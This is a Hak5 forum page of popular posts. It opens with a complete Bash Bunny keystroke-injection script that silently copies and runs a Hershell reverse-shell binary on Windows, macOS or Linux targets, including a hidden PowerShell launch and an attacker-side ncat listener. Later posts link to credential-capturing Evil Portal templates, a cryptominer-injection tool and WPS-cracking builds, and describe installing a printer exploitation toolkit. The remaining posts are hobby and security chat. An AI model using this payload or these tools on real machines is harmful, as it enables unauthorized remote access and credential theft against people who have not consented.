Jump to content
Hak5 Forums


Popular Content

Showing content with the highest reputation since 03/24/2018 in all areas

  1. 1 point
    Please PM me if there any issues/improvements. Thanks! #!/bin/bash # Title: Hershell Encrypted Reverse Shell (Cross-platform - Manual Mode) # Author: m3t4lk3y # Version: 0.5 # Target: Windows, Mac OSX, Linux # Creds: Ronan Kervella (Creator of Hershell) - https://github.com/sysdream/hershell # Instructions: # Hershell Github: https://github.com/sysdream/hershell (read all instructions on Hershell git before starting) # 1. Compile all payloads and place binaries in the payloads\$SWITCH_POSITION directory (Double check binary names. Defaults are mac32, linux32, win32.exe) # 2. Uncomment desired target OS payload lines and ensure others are commented out # 3. Start ncat listener on your attacking machine, that is to receive the reverse shell (e.g. ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 4343) # 4. Execute attack via Bash Bunny # SETUP DRIVER_LABEL='WINDOWS' # Drive label for your Bash Bunny LED R GET SWITCH_POSITION # Gets switch position (e.g. switch2) ATTACKMODE STORAGE HID SERIAL # Keyboard HID Attack + Storage + Serial # Modified RUN helper function RUN() { local os=$1 shift [[ -z "$os" || -z "$*" ]] && exit 1 case "$os" in WIN) QUACK GUI m QUACK DELAY 500 QUACK GUI r QUACK DELAY 500 QUACK STRING cmd.exe QUACK DELAY 100 QUACK ENTER QUACK DELAY 500 QUACK STRING "$@" QUACK DELAY 100 QUACK ENTER ;; OSX) QUACK GUI SPACE QUACK DELAY 100 QUACK STRING terminal QUACK DELAY 100 QUACK ENTER QUACK GUI t QUACK DELAY 100 QUACK STRING /bin/bash QUACK DELAY 100 QUACK ENTER QUACK STRING "$@" QUACK DELAY 100 QUACK ENTER QUACK DELAY 100 QUACK STRING "exit" QUACK DELAY 100 QUACK ENTER QUACK DELAY 100 QUACK STRING "exit" QUACK DELAY 100 QUACK ENTER ;; UNITY) QUACK ALT F2 QUACK DELAY 1000 QUACK STRING xterm QUACK DELAY 1000 QUACK ENTER QUACK DELAY 1000 QUACK STRING /bin/bash QUACK DELAY 1000 QUACK ENTER QUACK DELAY 500 QUACK STRING cd /media/'$USER' QUACK DELAY 500 QUACK ENTER QUACK DELAY 500 QUACK STRING "$@" QUACK DELAY 500 QUACK ENTER QUACK DELAY 500 QUACK STRING "exit" QUACK DELAY 500 QUACK ENTER QUACK DELAY 500 QUACK STRING "exit" QUACK DELAY 500 QUACK ENTER ;; *) exit 1 ;; esac } export -f RUN # START Attack LED Y # [+] Mac - Uncomment the following lines to use: # until ls -halt /dev | head -n 5 | grep -q "nandf"; do sleep 1; done # Wait for bb to mount # LED Y FAST # RUN OSX "cp /Volumes/$DRIVER_LABEL/payloads/$SWITCH_POSITION/mac32 /tmp && chmod +x /tmp/mac32 && /tmp/mac32 &" # [+] Linux - Uncomment the following lines to use: until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5 # Wait for bb to mount LED Y FAST RUN UNITY "cd $DRIVER_LABEL/payloads/$SWITCH_POSITION && cp linux32 /tmp/ && chmod +x /tmp/linux32 && /tmp/linux32 &" # [+] Windows - Uncomment the following lines to use: # until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5 # Wait for bb to mount # LED Y FAST # RUN WIN powershell -NoP -NonI -W Hidden -exec bypass ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'\payloads\\$SWITCH_POSITION\win32.exe')" # END sleep 5 LED G # shutdown 0 # LIGHTS OUT = Shutdown and dismount (if desired)
  2. 1 point
    Just wanted to share a project I've been working on. Currently calling it "WarBox" as the initial intent was for wardriving and mobility. The unit at most only required one cable for power or can be used we certain battery packs. Control connection is made wireless offering SSH and VNC. Main reason for the build was to have a very clean device that had full linux capabilities for pentesting but in a compact package. It is a single enclosure containing: Raspberry Pi 3 - running Kali 2017.1 Two alfa network adapters GPS module Custom power distribution board Power supply Filtered cooling fan Input voltage is 8-26 volts allowing the use of many sources. GPS module is configured to work with kismet for logging while on wardrives. Also has external power switch that acts as a "Main" for the whole device. Also added power LED for easy visual reference. I plan to soon make a solar battery pack that will mount to the WarBox. I apologize for the poor quality picture and plan to post some more soon. Please share your thoughts on the WarBox!
  3. 1 point
    Hi. Im searching for sniffing any phones sms messaging. But I just find it is possibe with some phones (Samsung S5, S6, Note). Can I sniff any phones with RTL-SDR antenna & wireshark?
  4. 1 point
    I had Avira installed on my pc and it blocked the internet sharing
  5. 1 point
    https://github.com/j0te/bashbunny-payloads/tree/master/payloads/library/prank/FakeUpdate here you are
  6. 1 point
    Should be good thats all use.
  7. 1 point
    Something similar to this i would imagine :) https://github.com/arnaucode/coffeeMiner
  8. 1 point
    Evil Portals A collection of portals that can be loaded into the Evil Portal module and can be used to capture credentials. Usage and more; https://kbeflo.github.io/evilportals I'd be happy to hear about issues, and suggestions. Feel free to ask anything, contribute new templates, and improve the project.
  9. 1 point
    https://ibb.co/gF0E7n is how it is supposed to look
  10. 1 point
    Thanks team, I have been trying to get in more time to practice. You all gave very good answers to my question. This is why I choose Hak5 over the uhhhh competitors non-existant customer support. A Minipwner OG also reached out to me. So away I go practice practice practice. Thanks again. Peace.
  11. 1 point
    Message me in private (on the forum) I will give you some links to read, watch etc.
  12. 1 point
    I'm also wondering the same thing, I hope someone can chime in and clear it up for us both. Isn't there an Auto-Ethernet command now in firmware 1.5? - Added new AUTO_ETHERNET attackmode - This attackmode will first attempt to bring up ECM_ETHERNET. If after the default timeout of 20 seconds no connection is established, RNDIS_ETHERNET will be attempted. - In addition to AUTO_ETHERNET, ETHERNET_TIMEOUT_XX has been added. This sets the timeout to XX.
  13. 1 point
    Since getting a PacketSquirrel and learning that it would be great to drop behind amongst other things printers it got me thinking. The PacketSquirrel already has some solid tools installed as default but figured PRET (Printer Exploitation Toolkit) would be a nice addition. Info on PRET https://github.com/RUB-NDS/PRET Recent Blackhat presentation https://www.blackhat.com/docs/us-17/thursday/us-17-Mueller-Exploiting-Network-Printers.pdf Other printer attack info http://hacking-printers.net/wiki/index.php/Main_Page known vulnerable printer databases here https://github.com/RUB-NDS/PRET/tree/master/db Mine wasn't in the db but worked with pcl so I'm sure others will work also. After some challenges squeezing it onto the PocketSquirrel without going full extroot I think I figured it out on the default squirrel build. I tried adding /mnt as a opkg destination and using links and then pip etc... but in the end manual install of python modules seems to have the lowest footprint. After install still leaving the PacketSquirrel with 55% of unused rootfs . I'm not 100% sure if this can be "payloaded" but at least for remote SSH access its a nice tool to have. My problem now is the printer I borrowed uses PCL and that in itself is quite restrictive in what can be done with PRET, so im kinda out of my testing limit and need other targets to test against so I'm sharing it here for others to try. The install method I used in the end was to plug my USB drive into my laptop and git cloned each of the following to the drive. https://github.com/RUB-NDS/PRET https://github.com/etingof/pysnmp https://github.com/etingof/pysmi https://github.com/etingof/pyasn1 https://github.com/tartley/colorama Once cloned unplug safely and replug back into your squirrel. Then EXCLUDING PRET, go into each dir and use python to install the modules "python setup.py install' afterwards you should then be able to run PRET and use its tools from the squirrel directly.
  14. 1 point
    I've messed with PRET in the past. It is all python. I would say if the dependencies are met (which I believe they are all in python core) then it should work if PS has same dependencies in its core. You could make it an ssh console but it being python you could look through the main module to see how it uses its sub modules and incorporate that into your own interface to use. Hey @Dave-ee Jones , why don't you see how this can be incorporated as a module into that Wrt web interface you made? Would be great as a starter module to get a feel on how users can create their own modules for your system if you are going that way. :-)
  15. 1 point
  16. 1 point
    Put SSID filtering and Client filtering both to deny mode (without putting anything inside)
  17. 1 point
    Hi, I'm too shy to use my real name. Chose the pseudonym "enquire" because I'm generally curious about security. Also, I'm not game enough to say my favourite book, etc - seems too close to providing answers to security questions. ;) I've recently loaded a metasploitable vm to learn a few basic skills.
  18. 1 point
    Hi all, Any other players of Thief 1 (Dark Project) and Thief 2 (Metal Age)? I'm playing them both through for the third time in my life now. My God, what amazing games, even over 10 years later! I haven't yet played Thief 2X or any Fan Missions, going to give those a good go after completing The Metal Age again. My favourite games of all time, by far.
  19. 1 point
    That's on;y needed for the keys stored in the /root/.ssh folder though. I was able to take a Squirrel out of the box, use ssh-copy-id to copy my keys, and SSH in without changing any permissions. Currently you can use AutoSSH, but we are replacing that with SSHTunnel in firmware 1.1.
  20. 1 point
    I dont have the original one just my modified version from PyDuckGen: Click
  21. 1 point
    Could mod it to have 11 radios. Would be kind of costly tho.. Might just have to do it for the fun of it!
  22. 1 point
    My suggestion is to not have all your eggs in one basket. Personally, I think the idea of a master vault, is the wrong approach with respect to things like passwords and sensitive materials. Tavis Ormandy for example, has a habit of breaking password managers, mainly to help make them more secure, but nothing is beyond the end user to mess up somewhere, even when using password managers, and this only controls one facet of security from login using a password, where logging in on a system might be bypassed altogether, the vault is only safeguarding one part of the equation. Also, if someone guesses the password without using exploits to access a password manager, there isn't anything you can do to fix that issue once it's discovered, since it's not a flaw, just a weak master password. That said, I think a multi-layered approach, and if required to use password vault, more than one vault kept in different locations with separate password categories in each is a better idea. If that means as simple as an encrypted archive stored remotely or on other hardware separate from your local everyday workstation, then so be it. Add in a Yubi key to the mix, more layers. The more the better, but I can almost guarantee, no one here is doing 100% best practices at all times. We're human, and we screw up all the time. Ideally, you'd memorize them, but we all know that isn't always possible, as well as not always our choice when system passwords are sometimes setup for us in advance. Safeguarding passwords at the end of the day is as much about self diligence as it is how to store them securely, because if you can't keep your passwords or data safe without a password vault, chances are there are other things you need to look into securing as well. Best password manager? The one you've kept out of public hands at all times and with no access from anyone other than yourself, which goes to say, vault or no vault, no one should know where or what your passwords are stored in, including advertising what you use here.
  23. 1 point
    Usually it is expensive. https://www.wired.com/2015/11/heres-a-spy-firms-price-list-for-secret-hacker-techniques/ Do you have Anti Virus software installed? It helps to eliminate free/cheap tools found in public space. So from the hacker's perspective, why would he/she spend the effort & risk getting caught to target you for data that are not worth much? Furthermore why spend the effort to plant fake Skype messages on your PC? The hacker manage to access your PC, steal data without leaving any trace, but "carelessly" left a planted Skype messages is highly suspicious. Somebody wants you to take the fall. Can you share the Skype ids/email involved in the conversation?
  24. 1 point
    If done correctly i guess a hack can't be traced technically. So try to disprove the evidence. 1) Maybe you can prove you weren't near your laptop at the time of one of these skype incidents. 2) If there are skype recordings maybe they can work in your favor. 3) If your password was weak at the time (several old password may still be in the system), you can claim someone else hacked your account. 4) Maybe you have obvious enemies and if they had motive/means/opportunity, you can claim they did this .. 5) Etc .. Also it may be a good thing to lawyer up depending on how serious the situation is.
  25. 1 point
    I forgot to mention that the reason you are getting warnings about missing libpcap.so.1.3 when trying to run Reaver/wash/Bully, is because those programs are compiled with that version of libpcap. If you want to get rid of those warnings, you would need to either sym-link, or compile Reaver, Bully etc. with the newest libpcap. So i've also compiled Bully and Reaver alongside libpcap-1.8.1. This is not the "normal" version of Bully or Reaver. It's Aanarchyy's and t6x version, which has added Pixiewps functionality. (Works better in my opinion) So installing these, should let you avoid sym-linking after installing libpcap :) Source repos. are listed here: https://github.com/t6x/reaver-wps-fork-t6x https://github.com/aanarchyy/bully Link to IPK's below: Reaver: https://mega.nz/#!75EikSzL!L0Ux0hhm-R8YvSjHqoZ9wRHxBsiS6VFxW2adkLFuCfE Bully: https://mega.nz/#!2oNj0YgA!1PzGr-JxbjPO1DAl4x7SCfCVtg4LtXPk6lLl82V0r8U libpcap-1.8.1: https://mega.nz/#!atdFiRLA!gjnqKAxCd2w_2vBTpVstwYkaHbbZE_dSWHe3N1T0kkM